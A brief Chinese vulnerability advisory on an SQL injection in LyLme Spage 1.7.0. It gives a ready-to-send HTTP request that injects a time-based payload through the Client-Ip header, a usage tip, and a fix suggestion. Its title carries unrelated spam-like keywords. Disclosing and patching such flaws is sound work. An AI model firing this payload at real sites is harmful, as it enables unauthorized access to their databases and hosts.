想要导航页(正式版)骚虎,想要导航页(正式版)汤姆
墨初 知识笔记 135阅读
0x01 产品简介 
0x03 影响范围 
0x05 漏洞复现
LyLme Spage六零导航页是中国六零LyLme开源的一个导航页面。致力于简洁高效无广告的上网导航和搜索入口支持后台添加链接、自定义搜索引擎沉淀最具价值链接全站无商业推广简约而不简单。
0x02 漏洞概述LyLme Spage v1.7.0版本存在安全漏洞该漏洞源于通过function.php的$userip参数发现包含 SQL 注入漏洞未经授权的攻击者可通过该漏洞获取敏感信息,进一步利用可造成主机失陷。
0x03 影响范围 LyLme Spage 1.7.0
0x04 复现环境title上网导航 - LyLme Spage
0x05 漏洞复现 PoC
POST /apply/index.php?submitpost HTTP/1.1Host: your-ipAccept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charsetUTF-8Client-Ip: 0>if(1,sleep(10),2)>url 延时10秒
PS漏洞存在于 HTTP Header 的 Client-Ip 字段请求体中url字段值每请求一次就需要更换一次不然无法成功
0x06 修复建议 在get_real_ip 中检查验证IP合法性防止SQL注入
标签: